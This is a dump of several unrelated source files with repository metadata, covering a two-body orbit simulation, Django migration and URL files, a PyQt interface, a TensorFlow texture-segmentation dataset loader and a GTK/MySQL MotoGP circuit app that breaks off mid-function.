15ae4b8c93b30b433e574f4fcf0f17fa8d7081c3
|
efe344e299fb9dd7b6ab960a177b4becbfdfa96e
|
refs/heads/main
| 2023-06-27T08:34:37.893727
| 2021-08-03T04:48:20
| 2021-08-03T04:48:20
| 392,190,318
| 0
| 0
| null | 2021-08-03T04:47:37
| 2021-08-03T04:37:43
| null |
UTF-8
|
Python
| false
| false
| 2,799
|
py
|
#Utilizing Newton's Law of Gravitation to model a two-body system
#(a building block toward the 3-body problem).
import scipy as sci
import scipy.integrate
import scipy.linalg
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import animation
G = 6.6741e-11
m_nd = 1.989e+30 #mass of sun
r_nd = 5.326e+12 #distance between stars in Alpha Centauri
v_nd = 30000 #relative velocity of earth around sun
t_nd=79.91*365*24*3600*0.51 #orbital period of Alpha Centauri
K1=G*t_nd*m_nd/(r_nd**2*v_nd)
K2=v_nd*t_nd/r_nd
#Define masses
m1=1.1 #Alpha Centauri A
m2=0.907 #Alpha Centauri B
#Define initial position vectors
r1=[-0.5,0,0] #m
r2=[0.5,0,0] #m
#Convert pos vectors to arrays
r1=sci.array(r1,dtype="float64")
r2=sci.array(r2,dtype="float64")
#Find Centre of Mass
r_com=(m1*r1+m2*r2)/(m1+m2)
#Define initial velocities
v1=[0.01,0.01,0] #m/s
v2=[-0.05,0,-0.1] #m/s
#Convert velocity vectors to arrays
v1=sci.array(v1,dtype="float64")
v2=sci.array(v2,dtype="float64")
#Find velocity of COM
v_com=(m1*v1+m2*v2)/(m1+m2)
#A function defining the equations of motion
def TwoBodyEquations(w,t,G,m1,m2):
r1=w[:3]
r2=w[3:6]
v1=w[6:9]
v2=w[9:12]
r=sci.linalg.norm(r2-r1) #Calculate magnitude or norm of vector
dv1bydt=K1*m2*(r2-r1)/r**3
dv2bydt=K1*m1*(r1-r2)/r**3
dr1bydt=K2*v1
dr2bydt=K2*v2
r_derivs=sci.concatenate((dr1bydt,dr2bydt))
derivs=sci.concatenate((r_derivs,dv1bydt,dv2bydt))
return derivs
#Package initial parameters
init_params=sci.array([r1,r2,v1,v2]) #create array of initial params
init_params=init_params.flatten() #flatten array to make it 1D
time_span=sci.linspace(0,8,500) #8 orbital periods and 500 points
#Run the ODE solver
two_body_sol=sci.integrate.odeint(TwoBodyEquations,init_params,time_span,args=(G,m1,m2))
r1_sol=two_body_sol[:,:3]
r2_sol=two_body_sol[:,3:6]
#Create figure
fig=plt.figure(figsize=(15,15))
#Create 3D axes
ax=fig.add_subplot(111,projection="3d")
#Plot the orbits
ax.plot(r1_sol[:,0],r1_sol[:,1],r1_sol[:,2],color="darkblue")
ax.plot(r2_sol[:,0],r2_sol[:,1],r2_sol[:,2],color="tab:red")
#Plot the final positions of the stars
ax.scatter(r1_sol[-1,0],r1_sol[-1,1],r1_sol[-1,2],color="darkblue",marker="o",s=100,label="Alpha Centauri A")
ax.scatter(r2_sol[-1,0],r2_sol[-1,1],r2_sol[-1,2],color="tab:red",marker="o",s=100,label="Alpha Centauri B")
#Add a few more bells and whistles
ax.set_xlabel("x-coordinate",fontsize=14)
ax.set_ylabel("y-coordinate",fontsize=14)
ax.set_zlabel("z-coordinate",fontsize=14)
ax.set_title("Visualization of orbits of stars in a two-body system\n",fontsize=14)
ax.legend(loc="upper left",fontsize=14)
#Find location of COM
rcom_sol=(m1*r1_sol+m2*r2_sol)/(m1+m2)
#Find location of Alpha Centauri A w.r.t COM
r1com_sol=r1_sol-rcom_sol
#Find location of Alpha Centauri B w.r.t COM
r2com_sol=r2_sol-rcom_sol
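#Editor's sketch: the COM-relative solutions above are computed but never
#plotted; a second figure like this would show the orbits about the COM
#(uses only the matplotlib imports already present)
fig2=plt.figure(figsize=(15,15))
ax2=fig2.add_subplot(111,projection="3d")
ax2.plot(r1com_sol[:,0],r1com_sol[:,1],r1com_sol[:,2],color="darkblue")
ax2.plot(r2com_sol[:,0],r2com_sol[:,1],r2com_sol[:,2],color="tab:red")
ax2.set_title("Orbits relative to the centre of mass")
plt.show()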
|
[
"austinpower1258@gmail.com"
] |
austinpower1258@gmail.com
|
0af3b29891b6fbebdeee1c25209ba88f7d067e45
|
362591481e20b0cfb65d92829698d7defe22c4c4
|
/themarket/products/migrations/0001_initial.py
|
37b01d4360f441392b8fe107fafc8561743f5801
|
[] |
no_license
|
wahello/themarket
|
595025d62e1f7b00a78798475b2d8e9a2e2fe443
|
23fb34d7e850f50d9c7defd0de2649611086ea0f
|
refs/heads/master
| 2020-08-01T19:43:17.681826
| 2018-09-03T11:27:05
| 2018-09-03T11:27:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 909
|
py
|
# Generated by Django 2.0.6 on 2018-08-02 11:57
from django.db import migrations, models
import products.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('slug', models.SlugField(blank=True, unique=True)),
('description', models.TextField()),
('price', models.DecimalField(decimal_places=2, default=19.99, max_digits=25)),
('image', models.ImageField(blank=True, null=True, upload_to=products.models.upload_image_path)),
('featured', models.BooleanField(default=False)),
],
),
]
|
[
"peadarh10@gmail.com"
] |
peadarh10@gmail.com
|
5cfdb1953496c336c527e9960195efc031c7c309
|
c09b12ec1e56ff679c9795c48d828d832630e49f
|
/hw6/webapps/urls.py
|
f42d5dabb59476e001a7d847daa9524edeb0bd7d
|
[] |
no_license
|
justinguo/Web-Application-Development
|
9bceda6bb3359eea2f5f03b88b638218d7a51f4f
|
23eb79359b0ad3b202b32d55ba33ccd1e40d4d6a
|
refs/heads/master
| 2021-01-21T05:16:55.119537
| 2017-02-25T22:15:51
| 2017-02-25T22:15:51
| 83,166,202
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 207
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
url(r'', include('socialnetwork.urls')),
)
|
[
"justinguo317@gmail.com"
] |
justinguo317@gmail.com
|
a64a605f728f7e372b162f11ff7618200ec903bc
|
beebc5ff44407f3f3a4c1463cd09f0917dbe5391
|
/pytype/tools/merge_pyi/test_data/simple.comment.py
|
1b8f2e1604e2a1c309c4cf80b2abc6b62ca7c58b
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
mraarif/pytype
|
4f190cb2591896133761295f3d84d80602dffb58
|
546e8b8114c9af54a409985a036398c4f6955677
|
refs/heads/master
| 2023-01-23T09:48:06.239353
| 2020-12-02T06:08:27
| 2020-12-02T06:08:27
| 303,069,915
| 1
| 0
|
NOASSERTION
| 2020-12-02T06:08:28
| 2020-10-11T07:53:55
| null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
from typing import Any
def f1(a, b):
# type: (Any, Any) -> r1
"""Doc"""
return a+b
def f2(a):
# type: (Any) -> r2
return 1
def f3(a):
return 1
|
[
"rechen@google.com"
] |
rechen@google.com
|
f4cf95f415d6cafda447424f9f68a0875e3b4189
|
9cba18b1811fb6d4447627b6f6b64c18167cd590
|
/sclp028.py
|
ed5373544f969af84b6b6ec87aedd7649596f469
|
[] |
no_license
|
kh4r00n/SoulCodeLP
|
45e10778c3b894dbaadad46b213d25daf557f2a0
|
a104852d26edf0b11b23ec2545c9422e9ba42c6e
|
refs/heads/main
| 2023-08-10T22:46:01.123331
| 2021-10-05T03:02:36
| 2021-10-05T03:02:36
| 411,645,788
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
'''
Create a program that reads a 3-digit number
'''
num = int(input('Enter a number: '))
while num < 100 or num > 999:
    num = int(input('The number does not have 3 digits. Enter it again: '))
|
[
"noreply@github.com"
] |
kh4r00n.noreply@github.com
|
8a42837ead36a6a7bd40e72a709707c10b2da8a9
|
6f23d4d5cfd3b464457c6622e662af87bf957125
|
/crudapp/migrations/0010_auto_20200819_1604.py
|
80dc406f0446374f0e353312f24fc4bcc9316965
|
[] |
no_license
|
RohiniPunde/crud
|
31c411662350d1f85f334e3cad3adcf63c2098a9
|
a2ff0b051234f3c1584b8dadbc58ff01d9222730
|
refs/heads/master
| 2022-12-15T18:45:37.175833
| 2020-08-29T16:33:37
| 2020-08-29T16:33:37
| 287,257,366
| 0
| 0
| null | 2020-08-29T16:33:38
| 2020-08-13T11:09:54
|
Python
|
UTF-8
|
Python
| false
| false
| 389
|
py
|
# Generated by Django 3.0.3 on 2020-08-19 23:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crudapp', '0009_auto_20200819_1556'),
]
operations = [
migrations.AlterField(
model_name='customer',
name='phone',
field=models.BigIntegerField(null=True),
),
]
|
[
"punderohini@gmail.com"
] |
punderohini@gmail.com
|
4c3c2cc9d54d334c6c07cfddc33d6c9c853a2442
|
4be56098894a95da5964622fc4102b69e4530ab6
|
/题库/1032.等式方程的可满足性.py
|
7023bb9ec8392f37b654506730bd4b9421433cc1
|
[] |
no_license
|
ACENDER/LeetCode
|
7c7c7ecc8d0cc52215272f47ec34638637fae7ac
|
3383b09ab1246651b1d7b56ab426a456f56a4ece
|
refs/heads/master
| 2023-03-13T19:19:07.084141
| 2021-03-15T09:29:21
| 2021-03-15T09:29:21
| 299,332,864
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 95
|
py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : 1032.等式方程的可满足性.py
|
[
"1641429327@qq.com"
] |
1641429327@qq.com
|
eb357b4506f5f70ef0b18f378e976d94d6b2f4e8
|
3943103da2b3bef6b8b60b5f20ae901be7e4d61b
|
/602/day02.py
|
553fd27c2021b09c7e781bfcd47b81a9e91d4215
|
[] |
no_license
|
shangtengjun/spider
|
03006934f200e0efb5a4636a82fba7a1a576dd04
|
dc503ad949cbde7447b52425d66a94df7b43c19b
|
refs/heads/master
| 2022-12-09T21:46:40.386697
| 2020-09-09T08:33:17
| 2020-09-09T08:33:17
| 281,431,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,429
|
py
|
# coding:utf-8
import requests
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"}
s = 0
for i in range(20):
http_url = "http://tieba.baidu.com/f?kw=%E5%B9%BF%E4%B8%9C%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%E5%8D%8E%E7%AB%8B%E5%AD%A6%E9%99%A2&ie=utf-8&pn="+str(s)
response = requests.get(http_url, headers=headers)
html_content = response.content.decode('utf-8')
s += 50
r = open('.\class602\贴吧{}'.format(i+1),'w',encoding='utf-8')
r.write(html_content)
r.close()
'''
tu = ['https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/112/112-bigskin-1.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/513/513-bigskin-2.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/199/199-bigskin-2.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/167/167-bigskin-5.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/123/123-bigskin-2.jpg','https://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/184/184-bigskin-1.jpg']
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"}
for i in range(6):
response = requests.get(tu[i], headers=headers)
r = open('.\class602\图片{}'.format(i+1),'wb')
r.write(response.content)
r.close()
'''
|
[
"358695374@qq.com"
] |
358695374@qq.com
|
19767bc330f5767b57969673ea3e52cc7fd126c3
|
f7023b1c89a0dda7555b1eb84208a2d30cc9e8f8
|
/experimentFiles/experiment/ui_MainWindow.py
|
67b04bfb2b762476dcf8dc5ab367076846ada9b0
|
[] |
no_license
|
mercedes92/VisualIKExperiment
|
fc7424c0f827aa695bf1d34d8e4c7f5cf21e46d0
|
a9cfa1e541c1822cf7e6bc116c482f5fc289722e
|
refs/heads/master
| 2021-01-10T19:53:36.790976
| 2015-08-21T11:56:54
| 2015-08-21T11:56:54
| 39,624,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,165
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainUI.ui'
#
# Created: Thu Jul 2 18:53:45 2015
# by: PyQt4 UI code generator 4.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_guiDlg(object):
def setupUi(self, guiDlg):
guiDlg.setObjectName(_fromUtf8("guiDlg"))
guiDlg.resize(915, 569)
self.verticalLayout = QtGui.QVBoxLayout(guiDlg)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.testButton = QtGui.QPushButton(guiDlg)
self.testButton.setObjectName(_fromUtf8("testButton"))
self.horizontalLayout.addWidget(self.testButton)
self.stopButton = QtGui.QPushButton(guiDlg)
self.stopButton.setObjectName(_fromUtf8("stopButton"))
self.horizontalLayout.addWidget(self.stopButton)
self.verticalLayout.addLayout(self.horizontalLayout)
self.line = QtGui.QFrame(guiDlg)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.verticalLayout.addWidget(self.line)
self.errorLabel = QtGui.QLabel(guiDlg)
self.errorLabel.setObjectName(_fromUtf8("errorLabel"))
self.verticalLayout.addWidget(self.errorLabel)
self.scrollArea_2 = QtGui.QScrollArea(guiDlg)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents_2 = QtGui.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 893, 205))
self.scrollAreaWidgetContents_2.setObjectName(_fromUtf8("scrollAreaWidgetContents_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.scrollAreaWidgetContents_2)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.textEdit_2 = QtGui.QTextEdit(self.scrollAreaWidgetContents_2)
self.textEdit_2.setMinimumSize(QtCore.QSize(800, 100))
self.textEdit_2.setMaximumSize(QtCore.QSize(800, 200))
self.textEdit_2.setObjectName(_fromUtf8("textEdit_2"))
self.gridLayout_2.addWidget(self.textEdit_2, 0, 0, 1, 1)
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents_2)
self.verticalLayout.addWidget(self.scrollArea_2)
self.line_2 = QtGui.QFrame(guiDlg)
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.verticalLayout.addWidget(self.line_2)
self.poseLabel = QtGui.QLabel(guiDlg)
self.poseLabel.setObjectName(_fromUtf8("poseLabel"))
self.verticalLayout.addWidget(self.poseLabel)
self.scrollArea = QtGui.QScrollArea(guiDlg)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 874, 341))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.gridLayout = QtGui.QGridLayout(self.scrollAreaWidgetContents)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.textEdit = QtGui.QTextEdit(self.scrollAreaWidgetContents)
self.textEdit.setMinimumSize(QtCore.QSize(800, 300))
self.textEdit.setMaximumSize(QtCore.QSize(16777215, 300))
self.textEdit.setUndoRedoEnabled(False)
self.textEdit.setReadOnly(True)
self.textEdit.setObjectName(_fromUtf8("textEdit"))
self.gridLayout.addWidget(self.textEdit, 1, 0, 1, 1)
self.ficheroLabel = QtGui.QLabel(self.scrollAreaWidgetContents)
self.ficheroLabel.setObjectName(_fromUtf8("ficheroLabel"))
self.gridLayout.addWidget(self.ficheroLabel, 0, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.verticalLayout.addWidget(self.scrollArea)
self.retranslateUi(guiDlg)
QtCore.QMetaObject.connectSlotsByName(guiDlg)
def retranslateUi(self, guiDlg):
guiDlg.setWindowTitle(_translate("guiDlg", "visualiktester", None))
self.testButton.setText(_translate("guiDlg", "Run test", None))
self.stopButton.setText(_translate("guiDlg", "Stop", None))
self.errorLabel.setText(_translate("guiDlg", "Error Detectado:", None))
self.poseLabel.setText(_translate("guiDlg", "Pose Actual:", None))
self.ficheroLabel.setText(_translate("guiDlg", "Datos del fichero: ", None))
|
[
"mpaolett@alumnos.unex.es"
] |
mpaolett@alumnos.unex.es
|
58e2a64da4f5f9392df906fa7ed03792da1a3d60
|
dfbe8dacccf9527c6448e5edaf0568342b918a19
|
/src/dataset/dtd_dataset.py
|
80d2a42084e9ef7ad4d068118a0d2c2eec1b66a1
|
[
"MIT"
] |
permissive
|
FabianGroeger96/semantic-segmentation-dtd
|
e0add90e97f8d052690f3244426d19108bf5fb2c
|
084a0ab5807e912bee80ae2dcf5f22b7ef8579a1
|
refs/heads/main
| 2023-05-09T04:33:15.104499
| 2021-06-02T16:35:06
| 2021-06-02T16:35:06
| 325,009,577
| 3
| 0
|
MIT
| 2020-12-31T08:11:29
| 2020-12-28T12:41:09
|
Python
|
UTF-8
|
Python
| false
| false
| 6,532
|
py
|
import os
import math
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers.experimental.preprocessing import RandomFlip, RandomRotation, RandomContrast, RandomTranslation
from pathlib import Path
from src.settings.settings import Settings
class DTDDataset:
"""
Dataset representation for the Describable Textures Dataset (DTD).
Link to dataset: https://www.robots.ox.ac.uk/~vgg/data/dtd/
Implemented as Singleton.
"""
# instance of the class
__instance = None
@staticmethod
def get_instance(settings: Settings, log: bool = False):
""" Static access method. """
if DTDDataset.__instance is None:
DTDDataset(settings=settings, log=log)
return DTDDataset.__instance
def __init__(self, settings: Settings,
log: bool = False, name: str = 'DTD'):
""" Virtually private constructor. """
# throw exception if at initialization an instance already exists
if DTDDataset.__instance is not None:
raise Exception('Dataset should be a singleton \
and instance is not None at initialization.')
else:
DTDDataset.__instance = self
# parameters
self.log = log
self.name = name
self.settings = settings
self.AUTOTUNE = tf.data.experimental.AUTOTUNE
# True: one hot encoding for categorical
# False: no one-hot encoding for sparse categorical
self.one_hot = True
# define datasets
self.train_ds = None
self.val_ds = None
self.test_ds = None
# define data augmentation
self.data_augmentation = tf.keras.Sequential([
RandomFlip("horizontal_and_vertical"),
RandomRotation(0.4),
RandomContrast(0.4),
RandomTranslation(0.2, 0.2, fill_mode='reflect'),
])
# define the folders of the dataset
train_folder = 'dtd_train'
val_folder = 'dtd_val'
test_folder = 'dtd_test'
# if tiled should be used
if settings.use_tiled:
if log: print('Using tiled dataset')
train_folder += '_tiled'
val_folder += '_tiled'
test_folder += '_tiled'
# load datasets
self.train_ds, train_size = self.create_dataset(
os.path.join(self.settings.dataset_path, train_folder))
self.train_steps = math.floor(train_size / self.settings.batch_size)
self.val_ds, val_size = self.create_dataset(
os.path.join(self.settings.dataset_path, val_folder))
self.val_steps = math.floor(val_size / self.settings.batch_size)
self.test_ds, test_size = self.create_dataset(
os.path.join(self.settings.dataset_path, test_folder),
repeat=False)
self.test_steps = math.floor(test_size / self.settings.batch_size)
def _parse_function(self, image_filename, label_filename, channels: int):
"""
Parse image and label and return them. The image is divided by 255.0 and returned as float,
the label is returned as is in uint8 format.
Args:
image_filename: name of the image file
label_filename: name of the label file
channels: channels of the input image, (the label is always one channel)
Returns:
tensors for the image and label read operations
"""
image_string = tf.io.read_file(image_filename)
image_decoded = tf.image.decode_png(image_string, channels=channels)
image_decoded = tf.image.convert_image_dtype(
image_decoded, dtype=tf.float32)
# scale image from [0, 1] to [-1, 1] (zero-centred)
image = tf.multiply(image_decoded, 2.0)
image = tf.subtract(image, 1.0)
label_string = tf.io.read_file(label_filename)
label = tf.image.decode_png(label_string, dtype=tf.uint8, channels=1)
return image, label
@staticmethod
def load_files(data_dir: str):
path = Path(data_dir)
image_files = list(path.glob('image*.png'))
label_files = list(path.glob('label*.png'))
# make sure they are in the same order
image_files.sort()
label_files.sort()
image_files_array = np.asarray([str(p) for p in image_files])
label_files_array = np.asarray([str(p) for p in label_files])
return image_files_array, label_files_array
def create_dataset(self, data_dir: str, repeat: bool=True):
image_files_array, label_files_array = self.load_files(data_dir)
dataset = tf.data.Dataset.from_tensor_slices((image_files_array,
label_files_array))
# shuffle the filenames; unfortunately this means we cannot cache them
dataset = dataset.shuffle(buffer_size=10000)
# read the images
dataset = dataset.map(
lambda image, file: self._parse_function(
image, file, self.settings.patch_channels))
# Set the sizes of the input image, as keras needs to know them
dataset = dataset.map(
lambda x, y: (
tf.reshape(x, shape=(
self.settings.patch_size, self.settings.patch_size, self.settings.patch_channels)),
tf.reshape(y, shape=(
self.settings.patch_size, self.settings.patch_size))))
# cut center of the label image in order to use valid filtering in the
# network
b = self.settings.patch_border
if b != 0:
dataset = dataset.map(lambda x, y:
(x, y[b:-b, b:-b]))
if self.one_hot:
# reshape the labels to 1d array and do one-hot encoding
dataset = dataset.map(lambda x, y:
(x, tf.reshape(y, shape=[-1])))
dataset = dataset.map(
lambda x, y: (
x, tf.one_hot(
y, depth=self.settings.n_classes, dtype=tf.float32)))
if self.settings.augment:
dataset = dataset.map(
lambda x, y: (tf.squeeze(self.data_augmentation(tf.expand_dims(x, 0), training=True), 0), y),
num_parallel_calls=self.AUTOTUNE)
# batch dataset
dataset = dataset.batch(self.settings.batch_size).prefetch(1000)
# repeat dataset
if repeat:
dataset = dataset.repeat()
return dataset, image_files_array.size
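# Editor's sketch: typical singleton usage. Assumes Settings can be
# constructed with defaults, which this file does not show.
if __name__ == '__main__':
    settings = Settings()
    dataset = DTDDataset.get_instance(settings, log=True)
    for images, labels in dataset.train_ds.take(1):
        print(images.shape, labels.shape)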
|
[
"fabian.groeger@bluewin.ch"
] |
fabian.groeger@bluewin.ch
|
453b76f5dada5d070199968e11ec8472ff2c4592
|
8ae061d040e16305d4025128b9bf0dfa2d77e6e1
|
/wordbook/pymodule/machine_learning/module/preprocessing/__init__.py
|
86473b6829de9d55cba7c2eba4aa35d20b70a6a6
|
[] |
no_license
|
shiinokinoki/flashcard
|
313a6b14d1016b2f9b3cd14b1792d3bc0f7fc2cd
|
144f867d364a1c53a457a0a8bebcc0e42da6c39f
|
refs/heads/master
| 2022-12-17T11:26:00.241838
| 2020-09-19T11:42:46
| 2020-09-19T11:42:46
| 294,350,980
| 0
| 0
| null | 2020-09-18T01:20:02
| 2020-09-10T08:33:20
|
CSS
|
UTF-8
|
Python
| false
| false
| 61
|
py
|
from ._data import Image_for_ocr
__all__ = ['Image_for_ocr']
|
[
"shue@shiikishuueinoMacBook-Air.local"
] |
shue@shiikishuueinoMacBook-Air.local
|
74c64ce4ae04ef8be29d1ae4925caa57cc9de28c
|
10cb919d03d1e50dda253c6e771d470c035f92d1
|
/proyecto/MotoGP/motogp_app.py
|
ba8fd9b0fd1f6c5b52d59405aa1df08e6db0097d
|
[] |
no_license
|
JoseVP/Python-Avanzado
|
0c1dc0f75dfd259cadfd30d7ce4d2ae3cd3bbce9
|
ca7c8e346cb170b170af2f5931c02f0d684ec109
|
refs/heads/master
| 2021-01-10T21:28:07.926457
| 2012-05-30T10:33:25
| 2012-05-30T10:33:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,358
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import MySQLdb
from gi.repository import Gtk
import subprocess
class Moto_GP:
    #------------------- INTERNAL FUNCTIONS -------------------#
    #Loads the initial circuits into the buttons of the start window
def cargar_circuitos_iniciales(self):
self.carreras = ['Qatar',
'España',
'Portugal',
'Francia',
'Cataluña',
'Gran Bretaña',
'Holanda',
'Alemania',
'Italia',
'Estados Unidos' ,
'Indianapolis',
'Republica Checa',
'San Marino' ,
'Aragon',
'Japon' ,
'Malasia',
'Australia',
'Valencia']
i=1
        #Load the race names into the start-window buttons
for carrera in self.carreras:
boton = self.builder.get_object('button%s'%i)
boton.set_label(carrera)
i+=1
    #Loads the details of the requested circuit
def cargar_informacion_circuito(self,circuito):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
query = "SELECT * FROM circuitos WHERE gran_premio = '%s'" % self.grandes_premios[circuito]
micursor.execute(query)
datos = micursor.fetchone()
        #Fill the labels with the retrieved information
texto_datos = self.builder.get_object("texto_longitud")
texto_datos.set_label(datos['longitud'])
texto_datos = self.builder.get_object("texto_ancho")
texto_datos.set_label(datos['anchura'])
texto_datos = self.builder.get_object("texto_curvas_der")
texto_datos.set_label(str(datos['curvas_der']))
texto_datos = self.builder.get_object("texto_curvas_izq")
texto_datos.set_label(str(datos['curvas_izq']))
texto_datos = self.builder.get_object("texto_recta")
texto_datos.set_label(datos['recta_larga'])
texto_datos = self.builder.get_object("texto_fecha_const")
texto_datos.set_label(datos['fecha_construccion'])
texto_datos = self.builder.get_object("texto_fecha_mod")
texto_datos.set_label(datos['fecha_modificacion'])
texto_datos = self.builder.get_object("label_nombre")
texto_datos.set_label('Gran Premio de %s - %s' % (circuito,datos['nombre']))
        #Close the database connection
micursor.close ()
Conexion.close()
    #Loads the records of the requested circuit
def cargar_records_circuito(self,circuito):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
        #Get the id associated with the circuit to fetch its exact records
query = "SELECT id FROM circuitos WHERE gran_premio = '%s'" % self.grandes_premios[circuito]
micursor.execute(query)
id_circuito= micursor.fetchone()
query = "SELECT * FROM records_circuitos WHERE id_circuito = '%s' ORDER BY categoria DESC" % id_circuito['id']
micursor.execute(query)
records = micursor.fetchall()
grid = self.builder.get_object("grid_records")
        #Store the initial category so we can detect when it changes in the data
cat_act = records[0]['categoria']
i = 2
for record in records:
if (record['categoria'] != cat_act):
                #If the category changed, check which one it is
                #to choose the row where we should start filling in data
if(record['categoria'] == 'MotoGP'):
i=2
elif (record['categoria'] == 'Moto2'):
i=7
elif (record['categoria'] == '125cc'):
i=12
cat_act = record['categoria']
label = self.builder.get_object("label_%s_%s" %(i,1))
            #temporada == 0 means there is no result,
            #so show that field as empty instead of a 0
if (record['temporada'] != 0):
label.set_label(str(record['temporada']))
else:
label.set_label('')
label = self.builder.get_object("label_%s_%s" %(i,2))
label.set_label(record['piloto'])
label = self.builder.get_object("label_%s_%s" %(i,3))
label.set_label(record['motocicleta'])
label = self.builder.get_object("label_%s_%s" %(i,4))
label.set_label(record['tiempo'])
label = self.builder.get_object("label_%s_%s" %(i,5))
label.set_label(record['velocidad'])
i+=1
grid.show_all()
    #Returns a tuple with the circuit image and the matching country flag
def cargar_imagenes(self,circuito):
imagenes= { 'Qatar' : 'resources/circuitos/qatar',
'España' : 'resources/circuitos/espana',
'Portugal' : 'resources/circuitos/portugal',
'Francia' : 'resources/circuitos/francia',
'Cataluña' : 'resources/circuitos/catalunya',
'Gran Bretaña' : 'resources/circuitos/gran_bretanya',
'Holanda' : 'resources/circuitos/holanda',
'Alemania' : 'resources/circuitos/alemania',
'Italia' : 'resources/circuitos/italia',
'Estados Unidos' : 'resources/circuitos/estados_unidos',
'Indianapolis' : 'resources/circuitos/indianapolis',
'Republica Checa' : 'resources/circuitos/republica_checa',
'San Marino' : 'resources/circuitos/san_marino',
'Aragon' : 'resources/circuitos/aragon',
'Japon' : 'resources/circuitos/japon',
'Malasia' : 'resources/circuitos/malasia',
'Australia' : 'resources/circuitos/australia',
'Valencia' : 'resources/circuitos/valencia',
}
return imagenes[circuito]+'-cir.jpg',imagenes[circuito]+'-band.png'
    #Launches the scraper from the OS to fetch data from www.motogp.com/es
def ejecutar_scrapper(self):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
        #To avoid piling up stale data, empty the tables first.
        #Deleting from the circuitos table is enough: the records
        #table is emptied automatically via ON DELETE CASCADE
query = "DELETE FROM circuitos WHERE 1"
micursor.execute(query)
Conexion.commit()
micursor.close()
Conexion.close()
        #Launch the scraper without logging so nothing is printed to the terminal
subproceso = subprocess.Popen(['scrapy','crawl', 'circuitos','--nolog'])
subprocess.Popen.wait(subproceso)
    #Checks that the tables exist and creates them if they don't.
    #If they do exist, verifies that there are exactly 18 circuits
def comprobar_tablas(self):
Conexion = MySQLdb.connect(host='localhost', user='admin',passwd='motogpadmin', db='MotogpDB')
micursor = Conexion.cursor(MySQLdb.cursors.DictCursor)
query = "show tables"
micursor.execute(query)
tablas = micursor.fetchall()
tabla_circuitos = False
tabla_records = False
tabla_correcta = True
if tablas:
for tabla in tablas:
if 'circuitos' == tabla['Tables_in_MotogpDB']:
tabla_circuitos = True
if 'records_circuitos' == tabla['Tables_in_MotogpDB']:
tabla_records = True
if not tabla_circuitos:
